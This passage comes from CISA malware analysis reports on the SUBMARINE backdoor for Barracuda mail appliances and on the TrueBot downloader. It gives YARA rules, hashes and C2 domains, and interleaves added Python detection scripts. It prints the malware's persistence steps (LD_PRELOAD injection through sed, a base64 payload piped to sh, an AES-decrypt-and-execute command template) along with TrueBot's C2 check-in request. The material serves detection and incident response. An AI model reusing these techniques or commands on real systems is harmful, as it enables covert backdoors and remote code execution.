           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"
           Malware_Type = "trojan backdoor"
           Tool_Type = "remote-access exploitation"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"
       strings:
           $s1 = { 73 6c 65 65 70 }
           $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
           $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
           $s6 = { 73 68 }
           $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Relationships
bbbae0455f... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
Description

The file 'run.sh' is a SUBMARINE loader. The file is a shell script located within the archive 'r' in the '/var/tmp' directory. The purpose of 'run.sh' is to perform a combination of file manipulation, script generation and execution (Figure 4). There are four variables within 'run.sh':

--Begin Variable List--

B1=$1
F="/boot/os_tools/hw-set"
S="/home/product/code/firmware/current/sbin/smtpctl"
A="/boot/os_tools/libutil.so"
B=`echo -n "sed -i "s|exec|BSMTP_ID=$B1 LD_PRELOAD=$A exec|g" $S"|base64 -w0`

--End Variable List--

The script begins by moving SUBMARINE from the '/var/tmp/' directory to the '/boot/os_tools/' directory for persistence.

The variable "B" is declared as a 'sed' command that replaces all occurrences of the string 'exec' with 'BSMTP_ID=$1 LD_PRELOAD=/boot/os_tools/libutil.so exec' in '/home/product/code/firmware/current/sbin/smtpctl'. This 'sed' command is then base64 encoded.

A new file called 'hw-set' is created in the '/boot/os_tools/' directory. A line is appended to the 'smtpctl' file which checks for the string 'LD_PRELOAD'. If the string is not found, the base64 encoded string stored in variable "B" is decoded and executed as a shell command and 'smtpctl' is restarted.

The 'chmod' command is used to set executable permissions for 'hw-set'.

The 'sed' command is used with the '-i' flag to modify the file 'update_version' within the '/boot/os_tools/' directory by appending a string to line 44. The appended string, "system('/boot/os_tools/hw-set 2>&1 >/dev/null &');", runs the file 'hw-set' in the background and redirects both output and errors to '/dev/null' whenever the file 'update_version' is executed.

The file 'hw-set' is executed and the 'sed' command with the '-i' flag is used to insert the string 'sleep 2m' on line 1 to set a sleep duration of 2 minutes.

Finally, all files and directories within '/var/tmp/' directory are removed.

Screenshots
Figure 4. - The contents of the file 'run.sh'.

b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43

Details


Name hw-set
Name sedO4CWZ9
Size 341 bytes
Type POSIX shell script, ASCII text executable, with very long lines
MD5 b860198feca7398bc79a8ec69afc65ed
SHA1 c4c64da81995044ea3447b8ffd07689382b7487b
SHA256 b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43
SHA512 0d4b66dbeb88e8c9fb970572c033ab84b8273734277edb139cdc04560a0547d192a6762fc8ed8138eb43f7d05df6c36aa6bc1987eda4a4b6075e9059e71ef358
ssdeep 6:JkKgPxJooRKGKBNvd/UntDEcQwj7bPfNcgUBZqcL0FcXfFtC2i+RKGKBNvSv:alZJoospwtIclTNcRDnv7CJ+spSv
Entropy 5.713942
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-05"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"
           Malware_Type = "trojan backdoor"
           Tool_Type = "remote-access exploitation"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"
       strings:
           $s1 = { 73 6c 65 65 70 }
           $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
           $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
           $s6 = { 73 68 }
           $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Description

The file 'hw-set' is a SUBMARINE artifact. The file is a shell script located in the '/boot/os_tools/' directory and contains shell commands as well as a base64 encoded string (Figure 5). The shell script is set to sleep for 2 minutes prior to execution. The 'grep' command checks if the string 'LD_PRELOAD' is contained within the 'smtpctl' file located at '/home/product/code/firmware/current/sbin/'. The exclamation point (!) prepending the script is used to check for success or failure of the 'grep' command. If the string 'LD_PRELOAD' is not identified, a base64 encoded 'sed' command is used to modify the 'smtpctl' file (Figure 6).

Screenshots
Figure 5. - The contents of the shell script in the file 'hw-set'.

Figure 6. - The decoded base64 string contained in the shell script of the file 'hw-set'.

cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a

Details


Name smtpctl
Size 3759 bytes
Type POSIX shell script, ASCII text executable
MD5 35a432e40da597c7ab63ff16b09d19d8
SHA1 b798b881b89526051ee5d50f24239b3a952c9724
SHA256 cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a
SHA512 af6aa47f44e604a60930f122ebd47d6c1b83c756b005d79ade8af147bfbfab40f16ba91e32021d65b18b21e06911476fb5d03f050850c8300d1e7d7a3e61c36b
ssdeep 48:t7c4VFuL2/zkanTvNpofcgBnY5NBFTGc5FjJWgkFBhhkQ1jtbA5lwmNdBITf3K3M:xcOko1iyGc6FzKAjDTvssgRaI7Q
Entropy 5.178501
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_05 : SUBMARINE trojan backdoor remote_access_trojan compromises_data_integrity cleans_traces_of_infection hides_artifacts installs_other_components remote_access exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-05"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "compromises-data-integrity cleans-traces-of-infection hides-artifacts installs-other-components"
           Malware_Type = "trojan backdoor remote-access-trojan"
           Tool_Type = "remote-access exploitation"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a"
       strings:
           $s1 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
           $s2 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 2f 6c 69 62 75 74 69 6c 2e 73 6f 20 65 78 65 63 }
           $s4 = { 3e 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 }
           $s5 = { 62 73 6d 74 70 64 20 63 6f 6e 74 72 6f 6c 20 73 63 72 69 70 74 }
           $s6 = { 42 53 4d 54 50 44 5f 50 49 44 }
           $s7 = { 2f 72 65 6c 6f 61 64 2f 72 65 73 74 61 72 74 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Description

The file 'smtpctl' is a SUBMARINE loader. The file is a maliciously modified shell script used to remove mail files in two directories as well as load SUBMARINE as a shared library for the Batched Simple Mail Transfer Protocol (BSMTP) daemon.

~Begin File Removal Commands~
rm -f /mail/scan/body*
rm -f /mail/tmp/mimeattach.*
~End File Removal Commands~

Appended malicious code at the bottom of 'smtpctl.sh' sets the BSMTP_ID and SUBMARINE is preloaded as a shared library from the '/boot/os_tools' directory. It then executes the BSMTP daemon. If the BSMTPD_PID variable is set, debug mode is enabled. If the BSMTPD_PID variable is not set, execution continues without enabling debug mode. Additionally, any instances of the string 'reload' in the command are replaced with 'restart' and all errors are redirected to '/dev/null' (Figure 7).
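The persistence chain described for 'run.sh', 'hw-set' and 'smtpctl' above leaves three file-level traces an incident responder can check: the 'system()' call appended at line 44 of 'update_version', the delayed 'grep'/'base64 -d | sh' logic in 'hw-set', and the 'LD_PRELOAD=... exec' rewrite of 'smtpctl'. The following host check is an added example, not CISA's tooling; the three sample files are constructed stand-ins shaped after the report's description (the BSMTP_ID value and the 'bsmtpd' invocation are made up), and the indicator labels are mine.

```python
import base64
import re

SMTPCTL_PATH = "/home/product/code/firmware/current/sbin/smtpctl"

# Constructed stand-ins shaped after the report's description of each file;
# they are not the real artifacts. BSMTP_ID=4242 is a made-up value.
SED_COMMAND = (
    f'sed -i "s|exec|BSMTP_ID=4242 LD_PRELOAD=/boot/os_tools/libutil.so exec|g" {SMTPCTL_PATH}'
)
SAMPLE_HW_SET = (
    "#! /bin/sh\n"
    "sleep 2m\n"
    f"! grep -q LD_PRELOAD {SMTPCTL_PATH} && "
    f"echo -n '{base64.b64encode(SED_COMMAND.encode()).decode()}' | base64 -d | sh && "
    f"{SMTPCTL_PATH} restart\n"
)
# 43 filler lines so that the appended call lands on line 44, as described.
SAMPLE_UPDATE_VERSION = "\n".join(
    [f"# update_version line {n} (constructed filler)" for n in range(1, 44)]
    + ["system('/boot/os_tools/hw-set 2>&1 >/dev/null &');"]
) + "\n"
SAMPLE_SMTPCTL_INFECTED = (
    "#! /bin/sh\n"
    "# bsmtpd control script (constructed)\n"
    "BSMTP_ID=4242 LD_PRELOAD=/boot/os_tools/libutil.so exec "
    "/home/product/code/firmware/current/sbin/bsmtpd \"$@\" >/dev/null 2>&1\n"
)
SAMPLE_SMTPCTL_CLEAN = (
    "#! /bin/sh\n"
    "# bsmtpd control script (constructed)\n"
    "exec /home/product/code/firmware/current/sbin/bsmtpd \"$@\"\n"
)

# Per-file indicators taken from the behaviour the report describes.
INDICATORS = {
    "smtpctl": [
        ("LD_PRELOAD injected before exec", re.compile(r"LD_PRELOAD=\S+\s+exec\b")),
        ("preloads /boot/os_tools/libutil.so", re.compile(r"LD_PRELOAD=/boot/os_tools/libutil\.so\b")),
        ("BSMTP_ID forced into the environment", re.compile(r"\bBSMTP_ID=\S+")),
    ],
    "update_version": [
        ("launches /boot/os_tools/hw-set via system()", re.compile(r"system\('/boot/os_tools/hw-set[^']*'\)")),
    ],
    "hw-set": [
        ("delayed start with sleep", re.compile(r"^\s*sleep\s+\d+[smhd]?\b")),
        ("negated grep for LD_PRELOAD in smtpctl", re.compile(r"!\s*grep\b[^\n]*LD_PRELOAD[^\n]*smtpctl")),
        ("base64 payload piped to sh", re.compile(r"base64\s+-d\s*\|\s*sh\b")),
        ("restarts smtpctl", re.compile(r"smtpctl\s+restart\b")),
    ],
}


def check_file(kind, text):
    """Return [(label, line_number)] for every indicator of 'kind' found in
    'text'; the first matching line is reported for each indicator."""
    hits = []
    for label, pattern in INDICATORS[kind]:
        for number, line in enumerate(text.splitlines(), start=1):
            if pattern.search(line):
                hits.append((label, number))
                break
    return hits


def assess_host(files):
    """files maps a kind ('smtpctl', 'update_version', 'hw-set') to that
    file's text. Returns {kind: hits} for every kind with at least one hit."""
    report = {}
    for kind, text in files.items():
        hits = check_file(kind, text)
        if hits:
            report[kind] = hits
    return report


def persistence_chain_present(files):
    """True when every link of the chain is present: update_version runs
    hw-set, hw-set rewrites smtpctl, and smtpctl preloads the library."""
    report = assess_host(files)
    return all(kind in report for kind in ("update_version", "hw-set", "smtpctl"))


if __name__ == "__main__":
    samples = {
        "smtpctl": SAMPLE_SMTPCTL_INFECTED,
        "update_version": SAMPLE_UPDATE_VERSION,
        "hw-set": SAMPLE_HW_SET,
    }
    for kind, hits in assess_host(samples).items():
        for label, number in hits:
            print(f"{kind}:{number}: {label}")
    print("persistence chain present:", persistence_chain_present(samples))
```

On a live appliance the same functions would be fed the contents of '/home/product/code/firmware/current/sbin/smtpctl', '/boot/os_tools/update_version' and '/boot/os_tools/hw-set'; a missing 'hw-set' is itself a negative result for that link.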

Screenshots
Figure 7. - The appended malicious code loading SUBMARINE as the shared library for the BSMTP daemon. The BSMTP_ID value will be unique per device.

81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab

Details


Name libutil.so
Name update_version
Size 9396 bytes
Type ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
MD5 b745626b36b841ed03eddfb08e6bb061
SHA1 cb20b167795db258b307ddee91ded87a9e7562d0
SHA256 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
SHA512 d6b9dfc9b784ca76386cbbf2c75c7e0ad3ac45e4420a838bc21b1464d07208f46901d7a0c8fbeca90303ce48720d7fd60b76d25cfebf5ea5b385e6b9db10ed98
ssdeep 96:dVdsadO5BT/aucX3Qa/c2D1UKDUzW1MuBFQC0NysEuSobXoWhP:yadO5B71cX3Qgc2uKD+aMLC01EuSo
Entropy 3.466134
Malware Result unknown
Path /boot/os_tools/libutil.so
Path /boot/os_tools/update_version
Path /var/tmp/libutil.so
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_01 : SUBMARINE trojan backdoor remote_access_trojan remote_access information_gathering exploitation determines_c2_server controls_local_machine compromises_data_integrity
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-29"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "determines-c2-server controls-local-machine compromises-data-integrity"
           Malware_Type = "trojan backdoor remote-access-trojan"
           Tool_Type = "remote-access information-gathering exploitation"
           Description = "Detects SUBMARINE Barracuda backdoor samples"
           SHA256_1 = "81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab"
       strings:
           $s1 = { 32 35 30 2d 6d 61 69 6c 32 2e 65 63 63 65 6e 74 72 69 63 2e 64 75 63 6b }
           $s2 = { 6f 70 65 6e 73 73 6c 20 61 65 73 2d 32 35 36 }
           $s3 = { 65 63 68 6f 20 2d 6e 20 27 25 73 27 20 7c 20 62 61 73 65 36 34 20 2d 64 }
           $s4 = { 2d 69 76 }
           $s5 = { 48 65 6c 6c 6f 20 25 73 20 5b 25 73 5d 2c 20 70 6c 65 61 73 65 64 20 74 6f 20 6d 65 65 74 20 79 6f 75 }
           $s6 = { e8 47 fa ff }
           $s7 = { 63 6f 6d 6d 61 6e 64 }
           $s8 = { 2d 69 76 20 36 39 38 32 32 62 36 63 }
           $s9 = { 73 65 6e 64 }
           $s10 = { 73 6f 63 6B 65 74 }
           $s11 = { 63 6f 6e 6e 65 63 74 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Relationships
81cf3b162a... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
Description

The file 'libutil.so' is the SUBMARINE payload. 'libutil.so' is preloaded into the BSMTP daemon, the Linux executable responsible for receiving emails, and processing Simple Mail Transfer Protocol (SMTP) reply messages. Linux Shared Object Preloading is analogous to Dynamic-Link Library (DLL) side loading and DLL injection in the Windows OS.

This file is preloaded using the 'LD_PRELOAD' parameter, applied to 'bsmtpd', the BSMTP daemon executable. The preload parameter is added to two configuration files, files that control the behavior of 'bsmtpd.' When the configuration files restart the daemon, 'libutil.so' is loaded into its process memory, giving it the same privileges and access as 'bsmtpd.'

The malware obtains the BSMTP_ID environment variable from the infected system; the BSMTP_ID has the capacity to be used as a port for malicious traffic (Figure 8). The process this shared object file is running in, 'bsmtpd', is duplicated and launched using the 'fork' Linux function (Figure 9). The malware opens a connection to 127.0.0.1 on the victim machine it is running on (Figure 10). The 'recv' function is called after the connection is opened, showing that the malware has the capacity to obtain information from the context/environment it is executed in.

Figure 11, Pane 1, shows configuration settings for the BSMTP daemon that allow any email traffic for the address range 127/8 and multiple actions including 'ehlo'. Pane 2 shows the malware taking in data and loading the 'ehlo' action into memory.

Figure 12, Pane 1, shows the malware, in conjunction with 'snprintf_chk', printing the string 'echo -n '%s' | base64 -d | openssl aes-256-cbc -d -K 66833b26%d -iv 69822b6c%d 2>/dev/null | sh' to the Linux shell. The string is a command that accepts input '%s', decodes it with Base64, decrypts it with AES, pipes errors to std_out and executes it on the target with the 'sh' bash command and the 'system' Linux function. Lastly, the malware has the capacity to print the SMTP string '250-mail2.eccentric.duck Hello %s [%s], pleased to meet you'. Therefore, given this information, the malware has the capacity to accept encoded and encrypted inputs from 'bsmtpd', execute them, and print a message.

Screenshots
Figure 8. - Depicts the Linux function 'getenv' "BSMTP_ID" and setting the variable named "SRC_PORT".

Figure 9. - Depicts the Linux function 'fork'.

Figure 10. - Depicts the initialization of a connection using the Berkeley Sockets API.

Figure 11. - Pane 1 shows configuration settings for the BSMTP daemon, not in the malware. Pane 2 shows part of that configuration in the malware.

Figure 12. - Pane 1 shows the Linux functions 'snprintf_chk' and 'system'. Pane 2 shows configuration settings for the BSMTP daemon.

Relationship Summary

6dd8de093e... Contains 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
6dd8de093e... Contains bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
bbbae0455f... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
81cf3b162a... Contained_Within 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Acknowledgments

Mandiant contributed to this report.

July 5, 2023

MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received one Windows Portable Executable (PE) file for analysis. The file is a variant of TrueBot malware. It is designed to collect system information and report it to a command-and-control (C2). The bot is also capable of downloading and executing additional payloads.

For more information about this compromise, see Joint Cybersecurity Advisory Increased Truebot Activity Infects U.S. and Canada Based Networks.

Download the PDF version of this report:

For a downloadable copy of IOCs, see

AA23-187A STIX XML (XML, 204.54 KB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see

MAR-10445155-1.v1 STIX JSON (JSON, 16.51 KB )
Submitted Files (1)

7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7 (3LXJyAv6Gf.exe)

Domains (2)

dremmfyttrred[.]com

droogggdhfhf[.]com

Findings

7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7

Tags

trojan

Details
Name 3LXJyAv6Gf.exe
Size 1200732656 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 5588286a702e0c36c8318be0b164fa8c
SHA1 5449f3f141958de2d1140bc8323f5ac95c203287
SHA256 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
SHA512 105e72e1f1e3af8942e0e77e1294f74cd0518f7d601e4e2f20f7ed9db3cd1c67739c31e085e028eafe0394af74b2fbeb6ffbffb67d7731023a04c53a6784924e
ssdeep 25165824:d1AuQ/FFyK8db8kdjeyPpiMh5gbiwcfYjh+dkfaeLq4H/LLhtf:Q/FoK8rteknh54ZcfvdkfpnLhtf
Entropy 7.999996
Antivirus
ESET a variant of Win64/Agent.BVF trojan
YARA Rules
  • rule CISA_10445155_01 : TRUEBOT downloader
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10445155"
           Date = "2023-05-17"
           Last_Modified = "20230523_1500"
           Actor = "n/a"
           Family = "TRUEBOT"
           Capabilities = "n/a"
           Malware_Type = "downloader"
           Tool_Type = "n/a"
           Description = "Detects TRUEBOT downloader samples"
           SHA256 = "7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7"
       strings:
           $s1 = { 64 72 65 6d 6d 66 79 74 74 72 72 65 64 2e 63 6f 6d }
           $s2 = { 4e 73 75 32 4f 64 69 77 6f 64 4f 73 32 }
           $s3 = { 59 69 50 75 6d 79 62 6f 73 61 57 69 57 65 78 79 }
           $s4 = { 72 65 70 6f 74 73 5f 65 72 72 6f 72 2e 74 78 74 }
           $s5 = { 4c 6b 6a 64 73 6c 66 6a 33 32 6f 69 6a 72 66 65 77 67 77 2e 6d 70 34 }
           $s6 = { 54 00 72 00 69 00 67 00 67 00 65 00 72 00 31 00 32 }
           $s7 = { 54 00 55 00 72 00 66 00 57 00 65 00 73 00 54 00 69 00 66 00 73 00 66 }
       condition:
           5 of them
    }
ssdeep Matches

No matches found.

Relationships
7d75244449... Connected_To dremmfyttrred[.]com
7d75244449... Connected_To droogggdhfhf[.]com
Description

This artifact is a variant of the TrueBot downloader. The file is padded with over one gigabyte (Gb) of junk code, designed to hinder analysis. When the bot is executed on the system, it will check the current Operating System (OS) version (RtlGetVersion) and the processor architecture (GetNativeSystemInfo). From this information the bot will create a unique ID for the compromised system. It will store the ID in C:\ProgramData as a randomly named 13 character file with a .JSONIP extension, e.g. 'IgtyXEQuCEvAM.JSONIP'.

The malware proceeds to enumerate all running processes on the system. The bot configuration contains a list of common Windows processes that are excluded from its list. The remaining process names are concatenated into a base64 encoded string. The malware specifically looks for the presence of the following disassembly and debugging tools:

—Begin Disassembly & Debugging Tools—
IDA Pro
Process Monitor
ProcessHacker
Process Explorer
CFF Explorer
Resource Hacker
Cheatengine-x86_64
OllyDbg
Radare2
X64dbg
WinDbg
Zeta Debugger
Rock Debugger
Obsidian debugger
—End Disassembly & Debugging Tools—

The presence of these tools does not change the execution of the malware. They are also concatenated into a base64 encoded string and sent along with the system information.

Next, the malware will collect the ComputerName and Domain name of the system. All of the collected information and the unique ID is sent to a hard-coded Uniform Resource Locator (URL) in a POST request using a unique User-agent string:

—Begin POST Request—
POST
dremmfyttrred[.]com/dns.php
Content-type: application/x-www-form-urlencoded
Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)
—End POST Request—

The malware uses a second obfuscated domain to accept commands and receive additional payloads. The configuration contains two base64 encoded strings that the malware will decode and run through a string operation to generate a unique hexadecimal string. The hexadecimal string is decoded using the embedded RC4 key ‘YiPumybosaWiWexy’. The following URL was decoded from the strings:

—Begin Decoded URL—
droogggdhfhf[.]com/gate.php
—End Decoded URL—
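The check-in and tasking traffic described above (the POST to 'dns.php', the unique User-agent string, the second domain serving 'gate.php') and the '.JSONIP' ID file give a defender two concrete hunts. The following is an added example, not CISA's tooling: the proxy log lines are constructed, the log format is my own, and the assumption that the 13 ID characters are alphanumeric is mine (the report's example contains letters only).

```python
import re

# Indicators taken from the report (the domains are shown defanged there as [.]).
TRUEBOT_C2 = {"dremmfyttrred.com", "droogggdhfhf.com"}
TRUEBOT_USER_AGENT = "Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)"

# ID file: 13 random characters plus '.JSONIP' directly under C:\ProgramData.
# Assumption: the characters are alphanumeric.
JSONIP_NAME = re.compile(r"^[A-Za-z0-9]{13}\.JSONIP$", re.IGNORECASE)

# Constructed web-proxy log lines: time client method host path status "user-agent".
SAMPLE_LOG = """\
2023-06-14T10:02:11Z 10.0.0.5 POST dremmfyttrred.com /dns.php 200 "Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)"
2023-06-14T10:02:15Z 10.0.0.5 GET droogggdhfhf.com /gate.php 200 "Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)"
2023-06-14T10:03:40Z 10.0.0.7 GET www.example.com /index.html 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2023-06-14T10:04:02Z 10.0.0.9 POST cdn.example.net /dns.php 404 "curl/8.0.1"
"""

LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def parse_log_line(line):
    """Parse one constructed-format log line into a dict, or None if malformed."""
    match = LOG_LINE.match(line)
    if not match:
        return None
    ts, client, method, host, path, status, ua = match.groups()
    return {
        "time": ts,
        "client": client,
        "method": method,
        "host": host.lower(),
        "path": path,
        "status": int(status),
        "ua": ua,
    }


def truebot_reasons(entry):
    """Return the list of reasons a parsed log entry matches the report's
    TrueBot traffic profile (empty list means no match)."""
    reasons = []
    known_c2 = entry["host"] in TRUEBOT_C2
    if known_c2:
        reasons.append("known TrueBot C2 domain")
    if entry["ua"] == TRUEBOT_USER_AGENT:
        reasons.append("TrueBot user-agent string")
    if known_c2 and entry["method"] == "POST" and entry["path"] == "/dns.php":
        reasons.append("system-information check-in to dns.php")
    if known_c2 and entry["path"] == "/gate.php":
        reasons.append("tasking/payload retrieval from gate.php")
    return reasons


def hunt(log_text):
    """Return [(client, host, reasons)] for every log line that matches."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        reasons = truebot_reasons(entry)
        if reasons:
            alerts.append((entry["client"], entry["host"], reasons))
    return alerts


def is_jsonip_marker(path):
    """True for a Windows path of the form C:\\ProgramData\\<13 chars>.JSONIP."""
    parts = re.split(r"[\\/]+", path.strip())
    if len(parts) < 2 or parts[-2].lower() != "programdata":
        return False
    return bool(JSONIP_NAME.match(parts[-1]))


if __name__ == "__main__":
    for client, host, reasons in hunt(SAMPLE_LOG):
        print(f"{client} -> {host}: {', '.join(reasons)}")
    print(is_jsonip_marker(r"C:\ProgramData\IgtyXEQuCEvAM.JSONIP"))
```

The User-agent match stands on its own because the report describes the string as unique to the bot; a path match alone (last sample line) is deliberately not enough, since 'dns.php' and 'gate.php' are common names.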

dremmfyttrred[.]com

Tags

command-and-control

HTTP Sessions
  • POST
    dremmfyttrred[.]com/dns.php
    Content-type: application/x-www-form-urlencoded
    Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)
Relationships
dremmfyttrred[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
Description

3LXJyAv6Gf.exe attempts to send the collected system information to this domain.

droogggdhfhf[.]com

Tags

command-and-control

Relationships
droogggdhfhf[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
Description

3LXJyA6Gf.exe receives commands and payloads from this domain.

Relationship Summary

7d75244449... Connected_To dremmfyttrred[.]com
7d75244449... Connected_To droogggdhfhf[.]com
dremmfyttrred[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
droogggdhfhf[.]com Connected_From 7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
